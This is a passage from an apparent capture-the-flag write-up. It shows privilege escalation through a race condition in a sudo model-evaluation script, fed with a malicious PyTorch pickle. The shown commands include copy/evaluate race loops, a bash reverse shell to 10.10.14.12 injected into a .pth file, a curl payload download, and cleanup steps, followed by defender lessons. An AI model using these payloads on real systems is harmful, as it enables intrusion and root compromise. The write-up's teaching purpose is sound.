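    drop_file()
    with_race = flawed_check(target, lambda p: True, window=drop_file)

print(without_race, with_race)  # False True
```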

Here’s my script loop_copy.sh to constantly copy my malicious pth file into /models:

#!/bin/bash
while true
do
        cp /tmp/.Tools/revsh.pth /models/test.pth
done

And here’s my script loop_evaluate.sh to keep trying evaluate_model over and over until it eventually opens a reverse shell:

#!/bin/bash
while true
do
        sudo /usr/bin/evaluate_model /models/test.pth
done

I’ll run the former in the background, and the latter in the foreground:

/tmp/.Tools/loop_copy.sh &
/tmp/.Tools/loop_evaluate.sh

After a few iterations of loop_evaluate, I saw a connection arrive at my reverse shell listener…

root revshell fail

…but it closed right away. It could just be the wrong kind of reverse shell. I used a bash reverse shell for the initial foothold, so I’ll try that one again instead of the pure Python one:

python3 inject_into_torch.py revsh.pth \
"import os;os.system('bash -c \"sh -i >& /dev/tcp/10.10.14.12/4445 0>&1\"')"
mv revsh.pth ../www/  # Directory that http server is serving

Now download the new payload to the target and try again:

# pkill loop_copy.sh
curl -o /tmp/.Tools/revsh.pth http://10.10.14.12:8000/revsh.pth
/tmp/.Tools/loop_copy.sh &
/tmp/.Tools/loop_evaluate.sh

It worked almost instantly. Oddly, it didn’t open a reverse shell, but we got escalated privilege within the shell directly 🤔

root shell again

🎉 Success! We have just pwned the box in a second way!

Just in case we are overly concerned with gaining a second reverse shell as root, we can now easily open one:

bash -c 'sh -i >& /dev/tcp/10.10.14.12/4445 0>&1'

root shell again 2

CLEANUP

Target

I’ll get rid of the spot where I place my tools, /tmp/.Tools:

pkill loop_copy.sh
rm -rf /tmp/.Tools
rm /models/exfil.pth /models/revsh.pth /models/test.pth

Attacker

There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:

cd loot
rm -rf my_model.pth demo_model.pth smaller_cifar_net smaller_cifar_net.bak
# I'll only keep id_rsa

There’s also the matter of getting rid of my python venv that contains pytorch (which is huge):

cd ../exploit
deactivate # deactivate the venv
rm -rf ./bin ./include ./lib* ./share

It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:

NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;

Finally, clean up /etc/hosts:

sudo sed -i '/blurry.htb/d' /etc/hosts

LESSONS LEARNED

Attacker

📖 Read disclosure blogs very carefully. Many of the better infosec articles are surprisingly well-written. Sometimes there is a lot of detail in their words; it can be easy to miss if you’re skimming an article. Be sure to read actively and carefully. On this box, I missed a few details initially, causing me substantial delays.
😈 Malicious pickles are so easy! Keep an eye out for any time that an application implicitly trusts (or takes as input) a pickle. It is trivial to include malicious code inside the pickle. This whole process is made even easier by tools like fickling.

Defender

🥒 Never trust a pickle you don’t know. The only way to use pickles in a reasonably safe manner is to use a cryptographic signature on the pickle. If you can’t verify the pickle’s integrity, it shouldn’t be used as an input to a program.
⚙️ Don’t overlook the boring stuff. It seems that the developers on this box put a great deal of thought into how to protect their model from “overtly malicious” components, but failed to practice good file-permission hygiene. Good security isn’t always about preventing 0-days and nation state actors - sometimes it’s just about good ol’ access control.
👓 Secure coding practices are tough, but important. We demonstrated in the previous section how to exploit a subtle flaw in the evaluate_model script logic. This flaw could have been avoided by using a temporary, randomized filename - something that a good web developer would do instinctively for any file upload. However, since this script was intended for a trusted user (jippity) the author of the script was too trusting of the execution environment.